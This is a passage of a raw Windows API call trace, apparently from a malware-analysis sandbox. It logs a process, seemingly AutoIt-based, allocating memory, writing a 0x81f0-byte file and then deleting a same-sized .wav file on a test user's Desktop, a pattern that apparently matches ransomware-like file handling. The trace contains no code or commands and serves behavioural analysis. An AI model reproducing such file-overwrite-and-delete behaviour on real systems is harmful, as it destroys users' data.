hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0158.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0158.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0158.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0158.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0158.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0158.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0158.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0158.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0158.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0158.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0158.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0158.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0158.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0158.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0158.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0158.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0158.542] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0158.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0158.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0158.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0158.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0158.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0158.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0158.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0158.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0158.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0158.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0158.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0158.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0158.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0158.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0158.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0158.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0158.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0158.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0158.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0158.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0158.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0158.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0158.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0158.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0158.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0158.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0158.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0158.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0158.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0158.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0158.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0158.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0158.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0158.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0158.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0158.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0158.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0158.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0158.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0158.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0158.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0158.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0158.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0158.546] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0158.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0158.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0158.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0158.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0158.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0158.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0158.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0158.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0158.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0158.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0158.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0158.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0158.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0158.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0158.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0158.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0158.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0158.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0158.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0158.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0158.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0158.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0158.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0158.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0158.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0158.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0158.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0158.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0158.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0158.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0158.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0158.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0158.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0158.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0158.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0158.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0158.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0158.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0158.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0158.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0158.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0158.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0158.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0158.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0158.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0158.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0158.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0158.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0158.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0158.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0158.548] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0158.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd528, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0158.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0158.549] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0158.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0158.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0158.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0158.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0158.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0158.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0158.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0158.549] WriteFile (in: hFile=0x138, lpBuffer=0x9c5180*, nNumberOfBytesToWrite=0x81f0, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesWritten=0x87eae0*=0x81f0, lpOverlapped=0x0) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0158.550] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0158.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0158.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0158.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0158.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0158.551] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.551] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.551] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.551] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.551] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0158.551] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.551] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.551] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.556] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.556] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.556] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.556] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.556] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav", lpFilePart=0x0) returned 0x33 [0158.558] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7b58cd0, ftCreationTime.dwHighDateTime=0x1d5e423, ftLastAccessTime.dwLowDateTime=0x64768a0, ftLastAccessTime.dwHighDateTime=0x1d5e3d5, ftLastWriteTime.dwLowDateTime=0x3fc9e00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x81f0, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="CosD3IMWD.wav", cAlternateFileName="COSD3I~1.WAV")) returned 0x90ae18 [0158.558] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cosd3imwd.wav")) returned 1 [0158.562] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7b58cd0, ftCreationTime.dwHighDateTime=0x1d5e423, ftLastAccessTime.dwLowDateTime=0x64768a0, ftLastAccessTime.dwHighDateTime=0x1d5e3d5, ftLastWriteTime.dwLowDateTime=0x3fc9e00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x81f0, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="CosD3IMWD.wav", cAlternateFileName="COSD3I~1.WAV")) returned 0 [0158.562] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0158.562] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.564] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0158.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0158.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0158.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0158.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0158.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0158.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0158.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0158.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0158.565] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0158.565] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0158.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0158.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0158.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0158.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0158.565] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0158.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0158.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0158.565] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0158.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0158.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0158.565] RtlAllocateHeap (HeapHandle=0x8a0000, 